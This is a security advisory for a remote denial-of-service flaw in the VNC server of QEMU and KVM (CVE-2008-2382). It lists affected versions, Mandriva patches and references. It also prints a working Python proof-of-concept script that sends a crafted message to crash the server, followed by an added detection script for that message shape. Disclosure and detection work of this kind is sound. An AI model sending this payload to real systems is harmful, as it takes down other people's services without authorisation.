Written by Alfredo Ortega from Core Security Technologies
Monday, 06 April 2009 23:11
QEMU and KVM VNC Server Remote Denial of Service Vulnerability
-\\Bugtraq ID: 32910
-\\Class: Failure to Handle Exceptional Conditions
-\\CVE: CVE-2008-2382
-\\Remote: Yes
-\\Local: No
-\\Published: Dec 22 2008 12:00AM
-\\Updated: Apr 06 2009 08:16PM
-\\Credit: Alfredo Ortega from Core Security Technologies
-\\Vulnerable:
--S.u.S.E. SUSE Linux Enterprise Server 11 + Linux kernel 2.6.5
--S.u.S.E. SUSE Linux Enterprise Server 10
--S.u.S.E. openSUSE 11.1
--S.u.S.E. openSUSE 11.0
--S.u.S.E. openSUSE 10.3
--RedHat Fedora 9 0
--Qumranet KVM 79
--Qumranet KVM 36
--QEMU QEMU 0.9.1
--QEMU QEMU 0.9
--QEMU QEMU 0.8.2
--QEMU QEMU 0.6.1
--Pardus Linux 2008 0
--MandrakeSoft Linux Mandrake 2009.0 x86_64
--MandrakeSoft Linux Mandrake 2009.0
--MandrakeSoft Linux Mandrake 2008.1 x86_64
--MandrakeSoft Linux Mandrake 2008.1
--MandrakeSoft Linux Mandrake 2008.0 x86_64
--MandrakeSoft Linux Mandrake 2008.0
-\\Discussion: QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.
Attackers can exploit this issue to create a denial-of-service condition.
The following are vulnerable:
--QEMU 0.9.1 and prior
--KVM-79 and prior
-\\Exploit(s)/PoC(s): The following example exploit is available:
===============================================================
32910.py
^^^^^^^^^
##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
    print "Usage: %s host port" % sys.argv[0]
    exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types

sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
    print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)

s.close()
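
A detection-side example, added here and not part of the advisory or of Core Security's PoC: it walks a captured client-to-server RFB byte stream (after the handshake) and flags the message shape at the start of the PoC's final send, 02 00 00 00, which RFC 6143 framing reads as a SetEncodings message declaring zero encodings. Treating that shape as the indicator is an assumption drawn from the PoC's bytes, since the page does not describe the root cause; the function name and the sample streams are constructed for illustration.

```python
import struct

# Fixed client-to-server message sizes from RFC 6143, type byte included.
FIXED_LEN = {0: 20, 3: 10, 4: 8, 5: 6}

def scan_client_stream(data):
    """Walk post-handshake client-to-server RFB bytes.

    Returns (offset, finding) tuples. Parsing stops at the first unknown or
    truncated message, because message framing is lost from there on.
    """
    findings, off = [], 0
    while off < len(data):
        mtype = data[off]
        if mtype in FIXED_LEN:
            size = FIXED_LEN[mtype]
        elif mtype == 2:  # SetEncodings: type, pad, u16 count, count * s32
            if len(data) - off < 4:
                findings.append((off, "truncated SetEncodings header"))
                break
            (count,) = struct.unpack_from(">H", data, off + 2)
            if count == 0:
                findings.append((off, "SetEncodings with zero encodings"))
            size = 4 + 4 * count
        elif mtype == 6:  # ClientCutText: type, 3 pad, u32 length, text
            if len(data) - off < 8:
                findings.append((off, "truncated ClientCutText header"))
                break
            (length,) = struct.unpack_from(">I", data, off + 4)
            size = 8 + length
        else:  # extension types are reported, not guessed at
            findings.append((off, "unknown message type %d" % mtype))
            break
        if off + size > len(data):
            findings.append((off, "truncated message type %d" % mtype))
            break
        off += size
    return findings

# Constructed samples (not captured traffic).
BENIGN = (bytes(20)                                        # SetPixelFormat
          + struct.pack(">BxHii", 2, 2, 0, 1)              # SetEncodings, 2 entries
          + struct.pack(">BBHHHH", 3, 0, 0, 0, 640, 480))  # update request
ZERO_COUNT = struct.pack(">BxH", 2, 0)                     # SetEncodings, 0 entries

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("zero-count", ZERO_COUNT)):
        print(name, scan_client_stream(blob))
```

A zero-count SetEncodings is unusual for ordinary clients, so a hit is a lead for checking whether the VNC listener runs one of the versions listed above, not proof of an attack.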
-\\Solution: Updates are available. Please see the references for more information.
MandrakeSoft Linux Mandrake 2008.1 x86_64
--Mandriva dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.0-18.3mdv2008.1.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm http://www.mandriva.com/en/download/
MandrakeSoft Linux Mandrake 2008.1
--Mandriva dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.0-18.3mdv2008.1.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.0-18.3mdv2008.1.i586.rpm http://www.mandriva.com/en/download/
MandrakeSoft Linux Mandrake 2009.0
--Mandriva dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm http://www.mandriva.com/en/download/
--Mandriva kvm-74-3.1mdv2009.0.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm http://www.mandriva.com/en/download/
MandrakeSoft Linux Mandrake 2009.0 x86_64
--Mandriva dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva kvm-74-3.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm http://www.mandriva.com/en/download/
MandrakeSoft Linux Mandrake 2008.0 x86_64
--Mandriva dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.0-16.3mdv2008.0.x86_64.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm http://www.mandriva.com/en/download/
MandrakeSoft Linux Mandrake 2008.0
--Mandriva dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-0.9.0-16.3mdv2008.0.i586.rpm http://www.mandriva.com/en/download/
--Mandriva qemu-img-0.9.0-16.3mdv2008.0.i586.rpm http://www.mandriva.com/en/download/
-\\Reference(s):
--KVM Homepage http://kvm.qumranet.com/kvmwiki/Front_Pag (Qumranet)
--Qemu and KVM VNC server remote DoS http://www.coresecurity.com/content/vnc-remote-do (Core Security Technologies)
--QEMU Homepage http://bellard.org/qemu (QEMU)
--CORE-2008-1210: Qemu and KVM VNC server remote DoS http://www.securityfocus.com/archive/1/49950 (CORE Security Technologies Advisories)